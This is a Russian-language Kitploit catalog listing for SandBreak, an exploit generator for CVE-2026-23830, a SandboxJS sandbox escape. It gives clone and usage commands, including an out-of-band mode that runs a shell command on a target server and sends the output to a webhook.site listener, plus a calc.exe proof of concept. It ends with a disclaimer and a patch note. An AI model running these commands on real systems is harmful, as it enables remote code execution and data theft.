Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23830-SandBreak — Генерирует и доставляет эксплойт-пейлоады для CVE-2026-23830, обхода песочницы SandboxJS, с режимами для слепой внеполосной (OOB) эксфильтрации и локального PoC с calc. Поддерживает HTTP/HTTPS-прослушиватели и создаёт минифицированные JavaScript-пейлоады. | Kitploit
Инструменты/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Генерирует и доставляет эксплойт-пейлоады для CVE-2026-23830, обхода песочницы SandboxJS, с режимами для слепой внеполосной (OOB) эксфильтрации и локального PoC с calc. Поддерживает HTTP/HTTPS-прослушиватели и создаёт минифицированные JavaScript-пейлоады.

Репозиторий
1147 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SandBreak

CVE-2026-23830 Генератор эксплойтов и инструмент Auto-Pwn

Go Version License Type

SandBreak — это надёжный генератор эксплойтов на Go, предназначенный для использования уязвимости SandboxJS Escape (CVE-2026-23830).

Этот инструмент эксплуатирует незащищённый конструктор AsyncFunction в старых версиях sandboxjs, позволяя злоумышленникам выйти за пределы песочницы V8 и выполнить произвольный код на хост-системе. Он поддерживает несколько режимов полезной нагрузки, включая Blind OOB Exfiltration, Defacement и Error-Based RCE.


Возможности

  • 2 режима атаки:
    • oob: Внеполосная эксфильтрация данных (HTTP/HTTPS) для слепых сценариев.
    • calc: Запускает calc.exe (классический PoC).
  • Умный OOB: Автоматически определяет HTTP и HTTPS, чтобы предотвратить сбои сервера.
  • На основе Go: Один бинарный файл, никаких зависимостей на машине атакующего.
  • Лёгкий: Генерирует чистые, минифицированные JavaScript-полезные нагрузки.

Установка

Клонируйте репозиторий и запустите:

git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

Использование

go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. Режим OOB (Blind RCE — профессиональный)

Используйте его, когда у вас нет обратной связи по выводу. Он выполняет команду и отправляет результат в кодировке Base64 на ваш слушатель (например, webhook.site).

go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

Успешно обходит базовые сбои фильтрации исходящего трафика, обрабатывая сетевые ошибки.

2. Режим Calc (локальный тест)

Запускает калькулятор на сервере Windows.

go run CVE-2026-23830.go -mode calc

Доказательство концепции (PoC)

Сценарий: OOB-эксфильтрация

Атакующий получает данные пользователя сервера через Webhook, несмотря на отсутствие визуального вывода на сайте.


Отказ от ответственности

Этот инструмент создан только для образовательных целей и авторизованного тестирования на проникновение.

  • Не используйте этот инструмент на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
  • Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.

Меры по устранению

Обновите sandboxjs до последней версии, в которой конструктор AsyncFunction должным образом изолирован в песочнице.

npm update sandboxjs

Автор: Meysam Bal-afkan

Лицензия: MIT

Скачать инструмент